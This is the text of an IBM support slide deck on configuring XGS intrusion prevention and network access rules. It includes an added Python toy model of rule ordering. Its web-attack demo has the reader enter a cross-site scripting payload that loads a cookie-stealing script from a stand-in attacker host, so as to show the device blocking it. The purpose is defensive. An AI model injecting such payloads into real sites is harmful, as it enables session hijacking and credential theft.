
© 2015 IBM Corporation

Jenson John, Padmaja Deshmukh, L2 Technical Engineers, IBM Security Systems

February 22, 2016

Configuring an Intrusion Prevention Policy for blocking malicious files and blocking web application attacks

Use cases

● Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block file-based attacks.

● Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.

Use case 1: Topology

In this scenario, XGS blocks a malicious file when an end user attempts to download it from a vulnerable web server.


Accessing the Intrusion Prevention Policy

To navigate to the Intrusion Prevention Policy on the XGS LMI, click the Secure Policy Configuration link from the main menu and then click Intrusion Prevention Policy under the Security Policies.


Accessing and editing Default IPS object

Expand the left panel, select the Default IPS object. Right-click the Default IPS object and select Edit.


Editing IPS object


Enabling the Event Log

Add the Event Log object to Added Objects. Click Save Configuration and Deploy.


Accessing Network Access Policy

To navigate to the Network Access Policy, click the Secure Policy Configuration link from the main menu and then click Network Access Policy under the Security Policies.

Configuring a Network Access Rule

Click the New button to open the Add Network Access Rule window. On the General Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to Accept.

Response Tab

In the Response Tab, you can add an Event Log Object.

Source Tab

In the Source Tab, select Any (indicates Any Source).

Destination Tab

In the Destination Tab, select Any (indicates Any Destination).


Application Tab

In the Application tab, select Any.


Inspection Tab

In the Inspection tab, add the Default IPS inspection object.

Note: You can attach inspection objects to network access policy rules in conjunction with other network objects to filter certain traffic or events.


Deploy Network Access Policy

After the rule is created, click on Save Configuration and deploy the NAP policy.


Downloading the malicious file


Viewing the IPS Events

To view the IPS events, go to Monitor Analysis and Diagnostics > Logs and select IPS Events.

Log showing XGS detected and blocked malicious file

Under IPS Events > Pause Live Streaming, the U3D_Adobe_Memory_Corruption event is triggered on downloading the malicious PDF file.


View the IPS event details

Select the Event, and click on View Details to view more details.

Use case 2

● Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.

Use case 2: Topology

In this scenario, XGS blocks a web application attack when an end user attempts to inject a malicious script into a vulnerable web server.


Accessing Intrusion Prevention Policy

Navigating in the Local Management Interface: Click Secure, and then click Intrusion Prevention Policy.

In the IPS Objects pane, click New > Inspection > Intrusion Prevention.

Response Tab

• In the Response tab, you can enable Event Log, capture connection and capture packet.

• It also includes configuring notifications about events through email, SNMP, and remote syslog alerts.


New IPS object “Demo-WAP” is listed under the Inspection object


Adding filters


Enabling some of the Web Application Protection Signatures and setting them to block

Accessing Network Access Policy

Navigating in the Local Management Interface: Click Secure, and then click Network Access Policy.

Configuring a Network Access Rule

Click the New button to add a new Network Access Rule.


General Configuration Tab


Response Tab


Source Tab


Destination Tab


Application Tab


Inspection Tab


Schedule Tab


Tip: Place specific rules before general ones because rules are applied in the order they are listed in the Network Access Policy page.
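To make the ordering tip concrete, here is an added toy model (not IBM code, and not how the XGS engine is implemented) of first-match evaluation over an ordered Network Access Policy, using the tab fields from this deck. It assumes that "Any" matches every value, that the first enabled rule whose Source, Destination and Application all match decides the Action and Inspection object, and it uses constructed addresses and the deck's own object names, Default IPS and Demo-WAP.

```python
"""Toy first-match model of an ordered Network Access Policy (added example).

Assumption: the first enabled rule whose Source, Destination and Application
all match wins; "Any" matches anything. Addresses below are constructed.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Rule:
    order: int                      # Order field on the General Configuration tab
    enabled: bool                   # Enable check box
    action: str                     # "Accept" or "Drop"
    source: str = "Any"             # Source tab
    destination: str = "Any"        # Destination tab
    application: str = "Any"        # Application tab
    inspection: Optional[str] = None  # Inspection tab: attached IPS object


def _matches(value: str, pattern: str) -> bool:
    """A rule field matches when it is Any or equals the traffic attribute."""
    return pattern == "Any" or pattern == value


def evaluate(policy: List[Rule], src: str, dst: str, app: str) -> Tuple[Optional[Rule], Optional[str]]:
    """Walk rules by Order; return the first enabled match and its inspection object."""
    for rule in sorted(policy, key=lambda r: r.order):
        if not rule.enabled:
            continue
        if _matches(src, rule.source) and _matches(dst, rule.destination) and _matches(app, rule.application):
            return rule, rule.inspection
    return None, None  # the toy has no implicit default rule


def web_server_rule(order: int) -> Rule:
    """Specific rule: HTTP to the constructed web server 10.0.0.20, inspected by Demo-WAP."""
    return Rule(order, True, "Accept", destination="10.0.0.20", application="HTTP", inspection="Demo-WAP")


def catch_all_rule(order: int) -> Rule:
    """The deck's Any/Any/Any Accept rule carrying the Default IPS object."""
    return Rule(order, True, "Accept", inspection="Default IPS")


def specific_first() -> Optional[str]:
    """Specific rule at Order 1, catch-all at Order 2: web traffic gets Demo-WAP."""
    return evaluate([web_server_rule(1), catch_all_rule(2)], "10.0.0.5", "10.0.0.20", "HTTP")[1]


def general_first() -> Optional[str]:
    """Catch-all at Order 1 shadows the specific rule: Demo-WAP is never reached."""
    return evaluate([catch_all_rule(1), web_server_rule(2)], "10.0.0.5", "10.0.0.20", "HTTP")[1]
```

Running `specific_first()` yields Demo-WAP while `general_first()` yields Default IPS, which is exactly the shadowing the tip warns about.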


Simulating a Web Application Attack

Launch a browser and access the vulnerable web server, www.testfire.net. Click the Sign In link:

Adding a script to the Sign In page

<script src="http://hackerx.org/stealcookie.js"></script>

For username, enter the above script and for password, enter any string. Click Login.

XGS blocks the access


Viewing the IPS Events

To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main menu and then click Event Log. Select the IPS Events tab.


Event generated by XGS for associated attack


Event Detail


References

Configuring Network Access Policy: https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_about_acl_rules.htm

Configuring Intrusion Prevention Policy: https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_intrusion_prevention_policy_container.htm

Knowledge center for XGS: https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/alps_collateral/alps_dochome_stg.htm

X-Force Virtual Patch Protection Levels for XGS and GX: http://www-01.ibm.com/support/docview.wss?uid=swg21701441

Questions?

Chat with IBM Technical Support


Subscribe to our Channel

https://www.youtube.com/user/IBMSecuritySupport

© Copyright IBM Corporation 2015. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT ANY SYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

THANK YOU

www.ibm.com/security